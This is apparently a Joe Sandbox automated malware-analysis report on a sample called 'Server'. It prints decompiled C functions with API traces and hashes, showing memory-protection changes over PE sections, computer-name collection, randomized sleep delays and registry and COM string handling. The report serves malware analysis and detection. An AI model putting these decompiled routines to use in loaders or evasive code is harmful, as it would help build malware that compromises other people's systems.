            • Instruction ID: 5d9c3f05f0f46dd7afa9dd855db83e90556071015df760abc973ca805bcb04d9
            • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction Fuzzy Hash: 0BE0B6B1403220ABC7116F71BE0CA4F7E28BB89B527000539FA05F2279CB384A41CADC
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 01FC024D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_1fc0000_Server.jbxd
            Yara matches
            Similarity
            • API ID: AllocVirtual
            • String ID: cess$kernel32.dll
            • API String ID: 4275171209-1230238691
            • Opcode ID: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
            • Instruction ID: 2c408c3de3c5f89346c917da98fc267cfbffc02862680788a93cd0bd46bbc1be
            • Opcode Fuzzy Hash: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
            • Instruction Fuzzy Hash: 24C1A9B5D00229EFDB60CFA8D984BADBBB5BF08304F108099E548A7251DB319A95DF15
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E02025251(void* __edx) {
            				void* _v8;
            				int _v12;
            				WCHAR* _v16;
            				void* __edi;
            				void* __esi;
            				void* _t23;
            				intOrPtr _t24;
            				void* _t26;
            				intOrPtr _t32;
            				intOrPtr _t35;
            				void* _t37;
            				intOrPtr _t38;
            				intOrPtr _t42;
            				void* _t45;
            				void* _t50;
            				void* _t52;
            
            				_t50 = __edx;
            				_v12 = 0;
            				_t23 = E02026ADC(0,  &_v8); // executed
            				if(_t23 != 0) {
            					_v8 = 0;
            				}
            				_t24 =  *0x202a348; // 0xc7d5a8
            				_t4 = _t24 + 0x202bc70; // 0x2ca9218
            				_t5 = _t24 + 0x202bb60; // 0x4f0053
            				_t26 = E020233F1( &_v16, _v8, _t5, _t4); // executed
            				_t45 = _t26;
            				if(_t45 == 0) {
            					StrToIntExW(_v16, 0,  &_v12);
            					_t45 = 8;
            					if(_v12 < _t45) {
            						_t45 = 1;
            						__eflags = 1;
            					} else {
            						_t32 =  *0x202a348; // 0xc7d5a8
            						_t11 = _t32 + 0x202bcc8; // 0x2ca9270
            						_t48 = _t11;
            						_t12 = _t32 + 0x202bb60; // 0x4f0053
            						_t52 = E02025DE4(_t11, _t12, _t11);
            						_t59 = _t52;
            						if(_t52 != 0) {
            							_t35 =  *0x202a348; // 0xc7d5a8
            							_t13 = _t35 + 0x202bcf0; // 0x30314549
            							_t37 = E02025157(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
            							if(_t37 == 0) {
            								_t61 =  *0x202a2fc - 6;
            								if( *0x202a2fc <= 6) {
            									_t42 =  *0x202a348; // 0xc7d5a8
            									_t15 = _t42 + 0x202bcd2; // 0x52384549
            									E02025157(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
            								}
            							}
            							_t38 =  *0x202a348; // 0xc7d5a8
            							_t17 = _t38 + 0x202bbb8; // 0x2ca9160
            							_t18 = _t38 + 0x202bc1c; // 0x680043
            							_t45 = E02025B0E(_v8, 0x80000001, _t52, _t18, _t17);
            							HeapFree( *0x202a2d8, 0, _t52);
            						}
            					}
            					HeapFree( *0x202a2d8, 0, _v16);
            				}
            				_t54 = _v8;
            				if(_v8 != 0) {
            					E02027220(_t54);
            				}
            				return _t45;
            			}

            APIs
            • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02CA9218,00000000,?,746AF710,00000000,746AF730), ref: 020252A0
            • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02CA9160,?,00000000,30314549,00000014,004F0053,02CA9270), ref: 0202533D
            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,020268B6), ref: 0202534F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID: Uet
            • API String ID: 3298025750-2766386878
            • Opcode ID: c38f373a996aefaa3433c035f100d851eaac0d63a39cdd96d991cbf042a1fc90
            • Instruction ID: 0284da54577ea1b80787fe8e191cf0ce825f5245a01e39cb81578e1b16aac4b5
            • Opcode Fuzzy Hash: c38f373a996aefaa3433c035f100d851eaac0d63a39cdd96d991cbf042a1fc90
            • Instruction Fuzzy Hash: C9318C31A00328AFDB219B95DDC4EEA7BBDEB08704F660067B504AB120DB709A5CEB54
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(80000002), ref: 020243B5
            • SysAllocString.OLEAUT32(02024D42), ref: 020243F9
            • SysFreeString.OLEAUT32(00000000), ref: 0202440D
            • SysFreeString.OLEAUT32(00000000), ref: 0202441B
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: 88ec0f0a233111e4c05d4d7f35d399ee7f9b61025401e5dde1f38831ef5ea02b
            • Instruction ID: ab7d5c0d41dbae38818b1a7702c47afb153eda5e5c660483c8a135d6be33ca7c
            • Opcode Fuzzy Hash: 88ec0f0a233111e4c05d4d7f35d399ee7f9b61025401e5dde1f38831ef5ea02b
            • Instruction Fuzzy Hash: 87310C75900359AFCB15DF98D4C09EE7BB5FF48304B21882BF90697250D7749689CB61
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 65%
            			E0202213E(void* __ecx, intOrPtr _a4) {
            				struct _FILETIME _v12;
            				int _t13;
            				signed int _t16;
            				void* _t17;
            				signed int _t18;
            				unsigned int _t22;
            				void* _t30;
            				signed int _t34;
            
            				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
            				asm("stosd");
            				do {
            					_t13 = SwitchToThread();
            					GetSystemTimeAsFileTime( &_v12);
            					_t22 = _v12.dwHighDateTime;
            					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
            					_push(0);
            					_push(0x13);
            					_push(_t22 >> 5);
            					_push(_t16);
            					L02028436();
            					_t34 = _t16 + _t13;
            					_t17 = E02026269(_a4, _t34);
            					_t30 = _t17;
            					_t18 = 3;
            					Sleep(_t18 << (_t34 & 0x00000007)); // executed
            				} while (_t30 == 1);
            				return _t30;
            			}

            APIs
            • SwitchToThread.KERNEL32(?,00000001,?,?,?,02025044,?,?), ref: 0202214F
            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,02025044,?,?), ref: 0202215B
            • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 02022174
              • Part of subcall function 02026269: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 02026308
            • Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,02025044,?,?), ref: 02022193
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
            • String ID:
            • API String ID: 1610602887-0
            • Opcode ID: 4593e53ec9a56792c718fabf7748dd72e96c58ba8ed117b196cae3ba88764dbc
            • Instruction ID: 2b894f23abee965f91978a5ecd9237d42bd66b1b58eaaff2c6d4ec07f6ab3228
            • Opcode Fuzzy Hash: 4593e53ec9a56792c718fabf7748dd72e96c58ba8ed117b196cae3ba88764dbc
            • Instruction Fuzzy Hash: DFF08176E403187BD7149AA4CC5DFDE76B9EB84361F210525EA01E7240EAB89A098AA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E02025157(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
            				struct _FILETIME _v12;
            				void* _t11;
            				short _t19;
            				void* _t21;
            				void* _t22;
            				void* _t24;
            				void* _t25;
            				short* _t26;
            
            				_t24 = __edx;
            				_t25 = E02026536(_t11, _a12);
            				if(_t25 == 0) {
            					_t22 = 8;
            				} else {
            					_t26 = _t25 + _a16 * 2;
            					 *_t26 = 0;
            					_t22 = E0202330E(__ecx, _a4, _a8, _t25);
            					if(_t22 == 0) {
            						GetSystemTimeAsFileTime( &_v12);
            						_t19 = 0x5f;
            						 *_t26 = _t19;
            						_t21 = E02027767(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8); // executed
            						_t22 = _t21;
            					}
            					HeapFree( *0x202a2d8, 0, _t25);
            				}
            				return _t22;
            			}

            APIs
              • Part of subcall function 02026536: lstrlen.KERNEL32(?,00000000,02CA9E18,00000000,02026F0A,02CAA03B,43175AC3,?,?,?,?,43175AC3,00000005,0202A00C,4D283A53,?), ref: 0202653D
              • Part of subcall function 02026536: mbstowcs.NTDLL ref: 02026566
              • Part of subcall function 02026536: memset.NTDLL ref: 02026578
            • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74655520,00000008,00000014,004F0053,02CA9270), ref: 0202518F
            • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74655520,00000008,00000014,004F0053,02CA9270), ref: 020251BD
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
            • String ID: Uet
            • API String ID: 1500278894-2766386878
            • Opcode ID: e17b636f808c44510e62bf9eb5018e0ca911fa00655e6c7e0be42118099f5eec
            • Instruction ID: 1045ce23ea28f217a4c6c6c9ed546c30687f6c07ffac7c1dc09ebde34d102ec9
            • Opcode Fuzzy Hash: e17b636f808c44510e62bf9eb5018e0ca911fa00655e6c7e0be42118099f5eec
            • Instruction Fuzzy Hash: B101B132640319BBDB215F949C84E9A3FB9FF84714F600427FA009A160DA72C928DB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 87%
            			E004014CF(void* __eax, void* _a4) {
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				long _v20;
            				int _t42;
            				long _t53;
            				intOrPtr _t56;
            				void* _t57;
            				signed int _t59;
            
            				_v12 = _v12 & 0x00000000;
            				_t56 =  *0x404180;
            				_t57 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
            				_v16 =  *(__eax + 6) & 0x0000ffff;
            				VirtualProtect(_a4,  *(__eax + 0x54), _t56 - 0x43175abf,  &_v20); // executed
            				_v8 = _v8 & 0x00000000;
            				if(_v16 <= 0) {
            					L12:
            					return _v12;
            				} else {
            					goto L1;
            				}
            				while(1) {
            					L1:
            					_t59 = _v12;
            					if(_t59 != 0) {
            						goto L12;
            					}
            					asm("bt [esi+0x24], eax");
            					if(_t59 >= 0) {
            						asm("bt [esi+0x24], eax");
            						if(__eflags >= 0) {
            							L8:
            							_t53 = _t56 - 0x43175abf;
            							L9:
            							_t42 = VirtualProtect( *((intOrPtr*)(_t57 + 0xc)) + _a4,  *(_t57 + 8), _t53,  &_v20); // executed
            							if(_t42 == 0) {
            								_v12 = GetLastError();
            							}
            							_t57 = _t57 + (_t56 - 0x3175ac2) * 0x28;
            							_v8 = _v8 + 1;
            							if(_v8 < _v16) {
            								continue;
            							} else {
            								goto L12;
            							}
            						}
            						asm("bt [esi+0x24], eax");
            						_t53 = _t56 - 0x43175ac1;
            						if(__eflags >= 0) {
            							goto L9;
            						}
            						goto L8;
            					}
            					asm("bt [esi+0x24], eax");
            					if(_t59 >= 0) {
            						_t53 = _t56 - 0x43175aa3;
            					} else {
            						_t53 = _t56 - 0x43175a83;
            					}
            					goto L9;
            				}
            				goto L12;
            			}

            APIs
            • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
            • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
            • GetLastError.KERNEL32 ref: 00401583
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: ProtectVirtual$ErrorLast
            • String ID:
            • API String ID: 1469625949-0
            • Opcode ID: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
            • Instruction ID: db8870d9979c58085381c8b0541bfb0d1fdb36fbc34c572f0fe0e58abbf4653c
            • Opcode Fuzzy Hash: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
            • Instruction Fuzzy Hash: D1212B7280121AEFCB14CF95C9819AAF7B4FF58305F04487AE413AB960E738AA55CF58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 47%
            			E020212C6(char* _a4, char** _a8) {
            				char* _t7;
            				char* _t11;
            				char* _t14;
            				char* _t16;
            				char* _t17;
            				char _t18;
            				signed int _t20;
            				signed int _t22;
            
            				_t16 = _a4;
            				_push(0x20);
            				_t20 = 1;
            				_push(_t16);
            				while(1) {
            					_t7 = StrChrA();
            					if(_t7 == 0) {
            						break;
            					}
            					_t20 = _t20 + 1;
            					_push(0x20);
            					_push( &(_t7[1]));
            				}
            				_t11 = E020233DC(_t20 << 2);
            				_a4 = _t11;
            				if(_t11 != 0) {
            					StrTrimA(_t16, 0x2029278); // executed
            					_t22 = 0;
            					do {
            						_t14 = StrChrA(_t16, 0x20);
            						if(_t14 != 0) {
            							 *_t14 = 0;
            							do {
            								_t14 =  &(_t14[1]);
            								_t18 =  *_t14;
            							} while (_t18 == 0x20 || _t18 == 9);
            						}
            						_t17 = _a4;
            						 *(_t17 + _t22 * 4) = _t16;
            						_t22 = _t22 + 1;
            						_t16 = _t14;
            					} while (_t14 != 0);
            					 *_a8 = _t17;
            				}
            				return 0;
            			}

            APIs
            • StrChrA.SHLWAPI(?,00000020,00000000,02CA95FC,?,?,020253AF,?,02CA95FC), ref: 020212E2
            • StrTrimA.KERNELBASE(?,02029278,00000002,?,020253AF,?,02CA95FC), ref: 02021300
            • StrChrA.SHLWAPI(?,00000020,?,020253AF,?,02CA95FC), ref: 0202130B
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Trim
            • String ID:
            • API String ID: 3043112668-0
            • Opcode ID: 6faf47d0fec594af0b9cb9aa4f4bb99db683d4927b7aa3086aff6f7e57afd533
            • Instruction ID: 092c7842fd9e0ae606b0a0a46f6d4af234d0c0a319830bfec5e7e8a0a1dbb3bc
            • Opcode Fuzzy Hash: 6faf47d0fec594af0b9cb9aa4f4bb99db683d4927b7aa3086aff6f7e57afd533
            • Instruction Fuzzy Hash: BE01B17170036A6EEB214A6ACD84FABBBCEEB85254F140053B959CB282DA70C849D660
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E020261DA(void* _a4) {
            				char _t2;
            
            				_t2 = RtlFreeHeap( *0x202a2d8, 0, _a4); // executed
            				return _t2;
            			}

            APIs
            • RtlFreeHeap.NTDLL(00000000,00000000,02026383,00000000,?,00000000,00000000), ref: 020261E6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID: Uet
            • API String ID: 3298025750-2766386878

            C-Code - Quality: 75%
            			E0202790B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
            				void* _v8;
            				void* __esi;
            				intOrPtr* _t35;
            				void* _t40;
            				intOrPtr* _t41;
            				intOrPtr* _t43;
            				intOrPtr* _t45;
            				intOrPtr* _t50;
            				intOrPtr* _t52;
            				void* _t54;
            				intOrPtr* _t55;
            				intOrPtr* _t57;
            				intOrPtr* _t61;
            				intOrPtr* _t65;
            				intOrPtr _t68;
            				void* _t72;
            				void* _t75;
            				void* _t76;
            
            				_t55 = _a4;
            				_t35 =  *((intOrPtr*)(_t55 + 4));
            				_a4 = 0;
            				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
            				if(_t76 < 0) {
            					L18:
            					return _t76;
            				}
            				_t40 = E02024358(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
            				_t76 = _t40;
            				if(_t76 >= 0) {
            					_t61 = _a28;
            					if(_t61 != 0 &&  *_t61 != 0) {
            						_t52 = _v8;
            						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
            					}
            					if(_t76 >= 0) {
            						_t43 =  *_t55;
            						_t68 =  *0x202a348; // 0xc7d5a8
            						_t20 = _t68 + 0x202b270; // 0x740053
            						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
            						if(_t76 >= 0) {
            							_t76 = E02024984(_a4);
            							if(_t76 >= 0) {
            								_t65 = _a28;
            								if(_t65 != 0 &&  *_t65 == 0) {
            									_t50 = _a4;
            									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
            								}
            							}
            						}
            						_t45 = _a4;
            						if(_t45 != 0) {
            							 *((intOrPtr*)( *_t45 + 8))(_t45);
            						}
            						_t57 = __imp__#6;
            						if(_a20 != 0) {
            							 *_t57(_a20);
            						}
            						if(_a12 != 0) {
            							 *_t57(_a12);
            						}
            					}
            				}
            				_t41 = _v8;
            				 *((intOrPtr*)( *_t41 + 8))(_t41);
            				goto L18;
            			}


            APIs
              • Part of subcall function 02024358: SysAllocString.OLEAUT32(80000002), ref: 020243B5
              • Part of subcall function 02024358: SysFreeString.OLEAUT32(00000000), ref: 0202441B
            • SysFreeString.OLEAUT32(?), ref: 020279EA
            • SysFreeString.OLEAUT32(02024D42), ref: 020279F4
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: String$Free$Alloc
            • String ID:
            • API String ID: 986138563-0

            C-Code - Quality: 100%
            			E0040139F() {
            				char _v16;
            				intOrPtr _v28;
            				void _v32;
            				void* _v36;
            				intOrPtr _t15;
            				void* _t16;
            				void* _t24;
            				long _t25;
            				int _t26;
            				void* _t30;
            				intOrPtr* _t32;
            				signed int _t35;
            				intOrPtr _t38;
            
            				_t15 =  *0x404184;
            				if( *0x40416c > 5) {
            					_t16 = _t15 + 0x40513c;
            				} else {
            					_t16 = _t15 + 0x40529c;
            				}
            				E00401D3C(_t16, _t16);
            				_t35 = 6;
            				memset( &_v32, 0, _t35 << 2);
            				_t24 = E00401882( &_v32,  &_v16,  *0x404180 ^ 0xdd0210cf); // executed
            				if(_t24 == 0) {
            					_t25 = 0xb;
            				} else {
            					_t26 = lstrlenW( *0x404178);
            					_t8 = _t26 + 2; // 0x2
            					_t11 = _t26 + _t8 + 8; // 0xa
            					_t30 = E004015B0(_t38, _t11,  &_v32,  &_v36); // executed
            					if(_t30 == 0) {
            						_t32 = _v36;
            						 *_t32 = 0;
            						if( *0x404178 == 0) {
            							 *((short*)(_t32 + 4)) = 0;
            						} else {
            							L00401FE6(_t32 + 4);
            						}
            					}
            					_t25 = E004012FB(_v28); // executed
            				}
            				ExitThread(_t25);
            			}


            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: ExitThreadlstrlen
            • String ID:
            • API String ID: 2636182767-0

            APIs
            • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 020232AB
              • Part of subcall function 0202790B: SysFreeString.OLEAUT32(?), ref: 020279EA
            • SafeArrayDestroy.OLEAUT32(?), ref: 020232FB
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: ArraySafe$CreateDestroyFreeString
            • String ID:
            • API String ID: 3098518882-0

            C-Code - Quality: 100%
            			E020233F1(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
            				void* _t21;
            				void* _t22;
            				signed int _t24;
            				intOrPtr* _t26;
            				void* _t27;
            
            				_t26 = __edi;
            				if(_a4 == 0) {
            					L2:
            					_t27 = E020258BD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
            					if(_t27 == 0) {
            						_t24 = _a12 >> 1;
            						if(_t24 == 0) {
            							_t27 = 2;
            							HeapFree( *0x202a2d8, 0, _a4);
            						} else {
            							_t21 = _a4;
            							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
            							 *_t26 = _t21;
            						}
            					}
            					L6:
            					return _t27;
            				}
            				_t22 = E02022839(_a4, _a8, _a12, __edi); // executed
            				_t27 = _t22;
            				if(_t27 == 0) {
            					goto L6;
            				}
            				goto L2;
            			}


            APIs
              • Part of subcall function 02022839: SysFreeString.OLEAUT32(00000000), ref: 0202289C
            • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,746AF710,?,00000000,?,00000000,?,0202528E,?,004F0053,02CA9218,00000000,?), ref: 02023454
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Free$HeapString
            • String ID: Uet
            • API String ID: 3806048269-2766386878

            C-Code - Quality: 37%
            			E0202472F(void* __ecx) {
            				signed int _v8;
            				void* _t15;
            				void* _t19;
            				void* _t20;
            				void* _t22;
            				intOrPtr* _t23;
            
            				_t23 = __imp__;
            				_t20 = 0;
            				_v8 = _v8 & 0;
            				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
            				_t10 = _v8;
            				if(_v8 != 0) {
            					_t20 = E020233DC(_t10 + 1);
            					if(_t20 != 0) {
            						_t15 =  *_t23(3, _t20,  &_v8); // executed
            						if(_t15 != 0) {
            							 *((char*)(_v8 + _t20)) = 0;
            						} else {
            							E020261DA(_t20);
            							_t20 = 0;
            						}
            					}
            				}
            				return _t20;
            			}


            APIs
            • GetComputerNameExA.KERNELBASE(00000003,00000000,02023DCD,00000000,00000000,?,76B5C740,02023DCD), ref: 02024747
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • GetComputerNameExA.KERNELBASE(00000003,00000000,02023DCD,02023DCE,?,76B5C740,02023DCD), ref: 02024764
              • Part of subcall function 020261DA: RtlFreeHeap.NTDLL(00000000,00000000,02026383,00000000,?,00000000,00000000), ref: 020261E6
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: ComputerHeapName$AllocateFree
            • String ID:
            • API String ID: 187446995-0

            C-Code - Quality: 100%
            			E02025006(signed int __edx, intOrPtr _a4) {
            				void* _t3;
            				void* _t5;
            				void* _t7;
            				void* _t8;
            				void* _t9;
            				signed int _t10;
            
            				_t10 = __edx;
            				_t3 = HeapCreate(0, 0x400000, 0); // executed
            				 *0x202a2d8 = _t3;
            				if(_t3 == 0) {
            					_t8 = 8;
            					return _t8;
            				}
            				 *0x202a1c8 = GetTickCount();
            				_t5 = E020254D8(_a4);
            				if(_t5 == 0) {
            					_t5 = E0202213E(_t9, _a4); // executed
            					if(_t5 == 0) {
            						if(E02026392(_t9) != 0) {
            							 *0x202a300 = 1; // executed
            						}
            						_t7 = E02022523(_t10); // executed
            						return _t7;
            					}
            				}
            				return _t5;
            			}


            APIs
            • HeapCreate.KERNELBASE(00000000,00400000,00000000,0202107E,?), ref: 0202500F
            • GetTickCount.KERNEL32 ref: 02025023
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
